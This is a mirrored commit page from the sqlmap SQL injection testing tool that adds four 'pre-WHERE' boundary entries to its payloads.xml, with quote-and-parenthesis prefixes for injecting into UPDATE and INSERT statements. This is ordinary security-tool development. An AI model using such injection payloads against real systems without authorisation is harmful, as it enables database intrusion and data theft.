sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-05-05 00:03:44 +03:00
Code Issues Packages Projects Releases Wiki Activity

adding support for pre-WHERE injections

Browse Source
This commit is contained in:
Miroslav Stampar 2011-08-24 09:04:18 +00:00
parent 8fe069b495
commit d283e3eb3c
1 changed files with 39 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
xml/payloads.xml
View File

@ -449,6 +449,45 @@ Formats:
<!-- End of WHERE/HAVING clause boundaries --> <!-- End of WHERE/HAVING clause boundaries -->
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>1</ptype>
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>4</level>
<clause>1</clause>
<where>1,2</where>
<ptype>2</ptype>
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix></suffix>
</boundary>
<boundary>
<level>5</level>
<clause>1</clause>
<where>1,2</where>
<ptype>4</ptype>
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix></suffix>
</boundary>
<!-- End of generic boundaries -->
<!-- Boolean-based blind tests - WHERE/HAVING clause --> <!-- Boolean-based blind tests - WHERE/HAVING clause -->
<test> <test>
<title>AND boolean-based blind - WHERE or HAVING clause</title> <title>AND boolean-based blind - WHERE or HAVING clause</title>